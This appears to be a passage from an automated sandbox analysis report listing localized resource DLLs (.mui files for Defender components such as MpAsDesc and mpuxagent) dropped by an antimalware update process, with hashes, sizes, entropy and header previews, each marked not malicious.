Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	4.925457782958137
Encrypted:	false
SSDEEP:	384:7r2dNnmbM1oBRvEAJ75KLysWS8/WdRDBRJLs4lGsQYV8:7rBbVhbgR1Po5V
MD5:	5B10AF1242CA7F648B490741F2DF8520
SHA1:	161D717DFF1072C6622DD3A61F298D8484B378CA
SHA-256:	AA5C7A32CE883F00D45F4AEAE72DFE705AE507181CC2CE689BF2426740EF2B83
SHA-512:	8BB0F6C91D5D3D756584A870641234274281A50C57F09DA47860E75F453BC8FA19CD4867B45DDF19DDB25C3EB1BABDEA8B3C145F1FD7A75CCFBB9A21FCCD8970
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........P...............................................p.......l....@.......................................... ...M...........R... ...........................................................................................rdata..p...........................@..@.rsrc....M... ...N..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..0I...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fa-IR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	5.474109560037299
Encrypted:	false
SSDEEP:	384:7rb5YGIOg9Zud+uROYGK8YGV5wYGa5GcmYGWm58JfFp0Gb0Q96Gv2coqbpy4mNrf:7rQvBOcXpwr0R1PAhXXCqR
MD5:	2B63BA7C3221EF6A93F9C2619E2C8A84
SHA1:	29A0C71E93399CA8AD8F12055115B1400AC0B566
SHA-256:	DE20279D35B8D326D76479B3FF7DBE7A61173FAF3D449058070542D9D58CB6A2
SHA-512:	551EF3BF1B49D72AE75669E21C85F1F5AA0B3A11D48CBC740FB8B3E997C759B763C3F50019C39F43734323F056513D127334675A5D2B3771433BFAA6F209873C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........H...............................................p......[.....@.......................................... ..TE...........J... ...........................................................................................rdata..p...........................@..@.rsrc...TE... ...F..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...@...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fi-FI\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63208
Entropy (8bit):	4.2112392217059735
Encrypted:	false
SSDEEP:	768:7rCPIDH1Jg5qxf3Jpppxo6oyoyoa/DCy79vTMtR1Pk+:Z7jfi6oyoyo7yBYtHPk+
MD5:	F2D957706D1265AA7B251713A3220A20
SHA1:	76DA3606374A078890CD3FF97A9ED8751A6EB1B4
SHA-256:	77D9FD696576B30926E34F7695151F88211223C8554614F77EB0F9D7E7F440B8
SHA-512:	C1430BA932E97267FD4F3E0C913AA1DD093EF60B99FF297066B5227B2DD4B64A5FDB6C2563B16DD3DB05D6160570D61B72D272F35E230B746215835476E0F075
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..L................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fi-FI\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53480
Entropy (8bit):	4.451441634787936
Encrypted:	false
SSDEEP:	768:7r5r1Y/GPl9V9JdhfiDQMlVLzEOq0TU8HYR1PgQZ:BraePl9V9JdhfiDXlUyYHPdZ
MD5:	7072A9CB63B9CB656A956520202F7CF9
SHA1:	C4B0D2B774AF2587B30F4916FCFE14CF5D45D96D
SHA-256:	09BE50B13ECC453C1ECC58DD010E571203F21C54A07D0378E9F38E21C71F3596
SHA-512:	33C423C67209132DF26EFC7C868DCA40EF4FB341AA275802D6A684EA18F63C8EEC36619DBA13DE641DB1F9C3AA5E06185351D333A5136E4212ACB0CBC744618E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fi-FI\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	4.968490013753031
Encrypted:	false
SSDEEP:	768:7rAwH/9EeGsV/d3vvWivhEIA3uWJorH+R1PpzC:tH/9EBsV/dfvVbrH+HPlC
MD5:	2951324A4D9633A4A8920464A73DA9CE
SHA1:	2DD0B8C501DBCC318285C002B9E8C30A6A516AFD
SHA-256:	97EF042D4E86CC9E9808A75D2E139163FBDE643AF128C4F7EF0E9623AAFFEBF3
SHA-512:	99FFBF511640A34A8D4AE07AE684B8E1B374ED4CE44C8EF4A36DA45A2078F7E60675FD0467E2D804321B3853C46AF3A23DC1DA95E15F0CFBCB4A6FBA89730C47
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........R...............................................p............@.......................................... ..PN...........T... ...........................................................................................rdata..p...........................@..@.rsrc...PN... ...P..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fil-PH\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31976
Entropy (8bit):	4.835586304677931
Encrypted:	false
SSDEEP:	384:7rq9iVdy/PySnwF1Xusmk4+n/IrxmK5NJMcWS8/WkRDBRJM+jlGsu0:7raX6S4d4SwrxmCNyVR1PEU
MD5:	DB490CD5090EB998C109D4F6C9F6B914
SHA1:	DB62CE7617D219DD894F4B24FB9DC1CAB87C9B29
SHA-256:	FC43DD264BE0FE99AC8E2D18B740EC0B73561582266D02D83EC1A47B175D4732
SHA-512:	884A3AF2F04E3CA077D3D55552C5A68589687F48841F9EA86DFCC3EE40DCA5F550A75A9130F1B3AF291848C260D8221145D3EAE05E1F52F079BD21A0706F5369
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........Z......................................................s.....@.......................................... ...V...........\... ...........................................................................................rdata..p...........................@..@.rsrc....V... ...X..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..@R...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fr-CA\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70904
Entropy (8bit):	4.122423830923978
Encrypted:	false
SSDEEP:	768:7r+HN1pfypacBHsn3GMxErz4b78btptrnDD333dUIN7bZIBIrJHI7GYR1PezV:2H/n294b78bBnDD333tYHP8V
MD5:	7449A7FA39DE266A5DA058FA94933C1E
SHA1:	ED33517694BDBD89DEA37EF630D1C10C441FF03C
SHA-256:	E5E4519B6F9EC15AFD5E1C1B8DF028741239B91DE7D0180856D0B51D57E37DE0
SHA-512:	2C89E1908BCBE5A03C5A6C0761318D347A588ED6CF3C062ED6A045942EE25DDABC4A61084D1E04C0CC98DD1A48BD170B4399E0E0551C8B6CA7E26FD3F634799A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................,....@.......................................... ..D................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fr-CA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31464
Entropy (8bit):	4.915678212733668
Encrypted:	false
SSDEEP:	384:7r7RBpShjacFbZW30+l3FiUmXPfF1B7dNzxnWS8/Wk4RDBRJcs4lGsQcitC:7rg0cFbZW30+d5kXB+aR1Pp5JtC
MD5:	CBF02EF073E0A7E07C4C59C4FBEF8C72
SHA1:	E8D4ACB42B7C56022BB88D6F232F59B3558E050B
SHA-256:	D8E1C88B12FA699ED1444022726AADB2464334CA00D9895EFC45A56864594DC9
SHA-512:	3433CABB73182128F0B89ED3DC2F87A6E862D5288D81C5DE5DDBAF27D2271E1CC2605F503F1FAAA41A005DCBDFC07E20E1C7CB050F2EF8F562DB3ECEF90DB570
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........X............................................................@.......................................... ...T...........Z... ...........................................................................................rdata..p...........................@..@.rsrc....T... ...V..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...O...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fr-FR\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70904
Entropy (8bit):	4.121673519833456
Encrypted:	false
SSDEEP:	768:7rCmVgfXLNsZ2YlMu66SaGViV1V4hVQvcSmmm5aIet5pIBI91pIMG7R1PB:NkaGViV1VrvNmmmz7HPB
MD5:	44B5E862B194D925A5ED71A1BEFC7F21
SHA1:	192D256D5A1181D5BF16FDC93181743E4A47F4AD
SHA-256:	09DDB691F5E89918D3F92F34599BEB55DEBF83057B51DAE49ECDE57E865C28A6
SHA-512:	DAA3D843AF33CC5BD5708AD7EFEE79753C50230F3DD4ADBC4745BF0BDFE063FA2BABE272D80305B77723F67C1941A7BA0CE4F4DF84690F280385A191BD9D98C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.....................................................................@.......................................... ..l................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fr-FR\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61176
Entropy (8bit):	4.339618308485451
Encrypted:	false
SSDEEP:	384:7raIa0nanlnb0Pn2Hwsk+1NZvJZOtTE/dvHEveEvtuKvqhqpqd+JBfyRekT3jCp9:7rR/nanln1cQT6dmfIe9W0rHTR1PxzFU
MD5:	355210542B63AEF819AF79C277934A80
SHA1:	90277CCC6DFDA524BD6541D8E1D8F57495EB8510
SHA-256:	70B660D64AB8266452B7273D938F9AC15626A4E1BB2D81049A3A84FA1F608AD9
SHA-512:	01F0ED128AE2E1E2A2E840B93AADFADB96A8B8B4E5C876767F892221C64DDF4BA2789AB5BCA0D84E2DA0BE5F33AFAA38D47C4916FE40036792C2B0F5600E551B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................d.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fr-FR\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54504
Entropy (8bit):	5.461282040222107
Encrypted:	false
SSDEEP:	768:7rT4s3btuQEU3LhIo+gUCXEmaQRH3khOjo5C4XDHh50R1PF4j:bz3btLhIoVt0mdB3kdn0HPF4j
MD5:	C341F1BAB98F727E1EA335C60C74D688
SHA1:	A124D15ED03B76695FEDD3381731265F28BE43D5
SHA-256:	C3410C3E57AC4B396F4D660D2B069998FDDAC50FA7F595C38F200C9B204182EF
SHA-512:	6AD8B35FA3DC5C431AED6CBF5E7AAA7B1694F3C0A3FF8CEADB404E1A7E06E1E1923F6B6AEF95FC90DB4A0AB19908E30BDE89ADE6E384AE3F37F4FECFB1084B88
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fr-FR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31464
Entropy (8bit):	4.905353829438806
Encrypted:	false
SSDEEP:	384:7rKA+2TBmkFbuRb+dG0ZntyE9AnnHBh6WS8/WqRDBRJGqslGslQ2I:7r9AkFbuRb+dGgx9AnrzR1PD6I
MD5:	23C5A9CECD33866C21A7B070E3416BBA
SHA1:	DA8B6D50FF058BAABBA3186E7C7C2532E21C9162
SHA-256:	69E95CF187C3FD04A40F1C7F0458AC091FDD6A4C51F91AEAD972EF60B8BC9A1F
SHA-512:	42F7183C196BF64157CD29791F650E6B31794CB661EEC0B26B38F8B612D8A6E3AD743479183C2AA15C8C1DDDCF7F0768BC2C0E46B6052380403956FA2962AF47
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........X.......................................................L....@.......................................... ...T...........Z... ...........................................................................................rdata..p...........................@..@.rsrc....T... ...V..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...O...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ga-IE\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30440
Entropy (8bit):	4.966121064246001
Encrypted:	false
SSDEEP:	384:7rA2f56/C172Vaov3PLejGzoyGDclQ6qWS8/W0RDBRJcs/Al3IhK:7rrfkC172Vaov3ucoyMclQk5R1Pd/hK
MD5:	946C26A01CE0B43BCE855766D8A2FBDA
SHA1:	2F34CF38EB7EF9E2ED6DA8E13F3E2E642360C2CD
SHA-256:	0B65D0F9B5E6F8EAD3F0F5DF10D7D5C4054E7F8AE2CA063075337EA33F44424D
SHA-512:	16FC8D4486C4E047FCFDFF86EB0380E7DA9F3BDE94F5AE7943D5B20FED9B2D72474BD22C4C4D5811AF4C6FE9DA2F5786CBC6F4C12AC983B3FF7B8CDFFD205091
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........T.......................................................+....@.......................................... ..<P...........V... ...........................................................................................rdata..p...........................@..@.rsrc...<P... ...R..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...K...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\gd-GB\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	32504
Entropy (8bit):	4.827800271227702
Encrypted:	false
SSDEEP:	384:7r7ltJ1V46vRsF0rPLEf8ofG+vjQIgWS8/WaRDBRJDhDIrltlyl:7rZhV46vRsF0rzoe+7V7R1PDz
MD5:	41145004FF8DD45A36D5CD7858D087D1
SHA1:	12FF9211F588C5172DC42EF60FD8F587437184C6
SHA-256:	32C4F684C3CDD43275402E451868C92B492A2A1A0E7766271F32F85FBF8D4A07
SHA-512:	48BA25B792EA4ED3A8F8C82690DCC0C676C7DC6820AFEABC4CD72C8160C79070581CF13FAA23786A506CA346E3F5519FB9D4F4B9DCCA5A55C202DB435559B56A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........\.......................................................x....@.......................................... ...Y...........^... ...........................................................................................rdata..p...........................@..@.rsrc....Y... ...Z..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..hT...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\gl-ES\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29432
Entropy (8bit):	4.9691572065468685
Encrypted:	false
SSDEEP:	384:7rJAplKuoqwIhaL5L+wt716WS8/WLRDBRJETl5N1:7rObTeVjt7paR1Pa1
MD5:	22E9CD2195300F874E22D56F229BE641
SHA1:	BAA3E1DFF1EED7B793A95EEDB521D6FE7527A016
SHA-256:	D7A9C4A0DB73D912AAEDF82B356746E0962D8737ED57B99FBED757ADFC569D97
SHA-512:	27906B9DB8F98DFBD1BEC59B209CDC6615B46A4857B960BA3DBF13DCA631843DC0DC0D15C4CD8DF5AEE8AF7F8F73019ED79B9A1825D3BA9A4C013BD47071F924
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........P...............................................p......].....@.......................................... ...M...........R... ...........................................................................................rdata..p...........................@..@.rsrc....M... ...N..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..hH...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\gu-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	5.543548048667205
Encrypted:	false
SSDEEP:	384:7rVjocP0im6yCGN5H6NbJNz6N6PNUR+gpbudLsPz5iVWS8/W0RDBRJ5s4lGsQ64:7r+CPUy6PFtJR1P659
MD5:	F86C2F189DDA9D4108B3FDB79D5810D0
SHA1:	55F28DCA6631034E42410F6D25908B44A3BABEB4
SHA-256:	768F2C4ABC1D699534336D1EBDCBF91A1161C225997F77F500B45D536FE7606B
SHA-512:	D2D8EE58B49CE07E215BF73E9467CD5C1E1E37EBCD3534684613FECE84E676B5D86D0F1911E96826467A744CE90CB35E2855B8F91B2C61774CDF60E56F2D7DB7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...,KVa...........!.........R...............................................p............@.......................................... ..PO...........T... ...........................................................................................rdata..p...........................@..@.rsrc...PO... ...P..................@..@............,KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\he-IL\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52456
Entropy (8bit):	4.939092503712537
Encrypted:	false
SSDEEP:	384:7rA6QsxiOQo4M1gaZiX/x2g17jUx5Ej67XL8FgcND1AG9JpZUeF2WKH5T4HK8WQ/:7rJdfhH074xfLa/HpZU4vKZTdbR1P2V
MD5:	27268B44DE213002D6C564F0649D5884
SHA1:	331D70E1B5F1CEA1290D0D57BD4C1A4F4DF9AAC4
SHA-256:	D1CC6105357A902F8246087E6339293F45EA0F4B64818B33BFD789087B05A159
SHA-512:	7A0F9D628940B232EACF8D22EAF645C41C965D58BE227E39006F78D37533399ADFA3C839390F991215854B41F7DF502F74F202BAB04F2FAEBB1DD489170B163A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................l....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\he-IL\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24296
Entropy (8bit):	5.74436511631483
Encrypted:	false
SSDEEP:	384:7rl9/GQBqv/7t/MXKGUk7nCLvGe4w/mwzFww8w9Cg51PlEMJCWS8/WwiRDBRJDwV:7r//xrxLw/mwRww8wVfJUR1P2y56
MD5:	E4E9EFAB27C62A9D23047178AFC9A83C
SHA1:	A5568EC62F57370ABDD23E744544A17CAC65FF7C
SHA-256:	1D409D392501FF2F8C33719F614B19CDBCF37DD582E643FE94B73AA26FA67BF1
SHA-512:	CD23E645CA1EA91A9EA4525348259DDBE9BF59E70E91248123AB698B4012DE2860506616E535BCFF8020911B90A8BACA6CCDB3B9BA84F8428E28B71ABE1D624E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...EKVa...........!.........<...............................................`............@.......................................... ...9...........>... ...........................................................................................rdata..p...........................@..@.rsrc....9... ...:..................@..@............EKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..(5...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\hi-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	5.4490481812670035
Encrypted:	false
SSDEEP:	384:7rmumsihkvF6NTM3ABu4chBWS8/WzRDBRJmPFewmEy4lGswqWX:7rNYNJlGR1Pm9zy5R
MD5:	52D701C3D270A2783E89EF8711ED4383
SHA1:	9E73FE269C5CFC76C176F277C7EAE5B4E004F81B
SHA-256:	4EC411DDEE07C86BBA7F9342A2AA57233EE6903AD4EFB7DE0EC35FD701708CF4
SHA-512:	4D19405A9D4CD4A293F76A1AD97CBC818D3FFD5D137D22D7CE7D4EDDBB24D9909617CF9D9B10A218FA48A0AC7F05502DF6046FA0F3089AA9EF01E30CEDF8FE3C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..._KVa...........!.........R...............................................p.......=....@.......................................... ..@O...........T... ...........................................................................................rdata..p...........................@..@.rsrc...@O... ...P..................@..@............_KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...J...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\hr-HR\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64744
Entropy (8bit):	4.256666884818551
Encrypted:	false
SSDEEP:	768:7rvKd6A7H4nrUt4IL1NhIz3lavaASmaisCAR6R1P06:3Kd6A7HGqhIz3lavaAiR6HP06
MD5:	2070095BD1B455178CF0308064EA9E03
SHA1:	00891465CA3273745E56DB4BA37CEB4B118D7C54
SHA-256:	7D0A7E01D342D95CEE088D0406B54D38478DD2B717DF1E46BA8F9D33F0F36D65
SHA-512:	C79706F4CEE44D1806779A4B20D5731020EBD59226365898CE6A134B9D1ECBE4835FDDC61108277BEDA11C5EBF037C472C7757A82184711D4AA54303F77A7586
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................`.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\hr-HR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28920
Entropy (8bit):	5.040725338347918
Encrypted:	false
SSDEEP:	384:7rRd6RTWzG8LV3hh8XfLDgR24861NHx2oP4DnBWS8/WZRDBRJdhl9549:7rE8LVy824869cR1Pdz49
MD5:	D6F9AFCC916DBED55F85C92AD37789E0
SHA1:	34E8EB25737C82D49982DCF46F2C969D3E64132B
